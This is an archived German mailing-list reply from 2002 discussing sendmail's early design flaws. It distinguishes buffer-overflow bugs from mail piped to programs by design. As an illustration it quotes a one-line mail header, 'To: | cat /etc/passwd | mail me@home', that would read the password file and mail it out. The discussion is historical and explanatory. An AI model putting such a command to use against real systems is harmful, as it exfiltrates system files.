[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FYI] (Fwd) Results, Not Resolutions
- To: Florian Weimer <fw@deneb.enyo.de>, debate@lists.fitug.de
- Subject: Re: [FYI] (Fwd) Results, Not Resolutions
- From: Gert Doering <gert@greenie.muc.de>
- Date: Tue, 19 Feb 2002 11:32:15 +0100
- Delivered-To: mailing list debate@lists.fitug.de
- In-Reply-To: <87wuxav1aa.fsf@deneb.enyo.de>; from Florian Weimer on Tue, Feb 19, 2002 at 12:05:33AM +0100
- List-Help: <mailto:debate-help@lists.fitug.de>
- List-Id: <debate.lists.fitug.de>
- List-Post: <mailto:debate@lists.fitug.de>
- List-Subscribe: <mailto:debate-subscribe@lists.fitug.de>
- List-Unsubscribe: <mailto:debate-unsubscribe@lists.fitug.de>
- Mailing-List: contact debate-help@lists.fitug.de; run by ezmlm
- References: <3C6F9F9D.15337.11595C@localhost> <87zo28fh1o.fsf@deneb.enyo.de> <20020219002358.A459@mandark.chaos.lab> <87wuxav1aa.fsf@deneb.enyo.de>
Hi,
On Tue, Feb 19, 2002 at 12:05:33AM +0100, Florian Weimer wrote:
> >> Dank sendmail konnte E-Mail auch zu frühen Tagen ausführbare Inhalte
> >> tragen. :-/
>
> Ein Beispiel von mehreren:
>
> http://www.cert.org/advisories/CA-93.16.sendmail.vulnerability
Wobei zwischen "Buffer overflow" und "Mail per Design als Code
interpretieren und ausfuehren" auch nochmal Welten liegen - das eine
ist ein Bug, das andere so gewollt.
Mail-an-Programme zustellen ("To: | cat /etc/passwd | mail me@home") ist
irgendwo dazwischen - ein Design, was ausreichend schlecht durchdacht war
und damit eine Trennung zwischen "lokal" und "remote" noetig macht, die
bei strikter Trennung Code/Data nicht noetig ist.
gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany gert@greenie.muc.de
fax: +49-89-35655025 gert.doering@physik.tu-muenchen.de
--
To unsubscribe, e-mail: debate-unsubscribe@lists.fitug.de
For additional commands, e-mail: debate-help@lists.fitug.de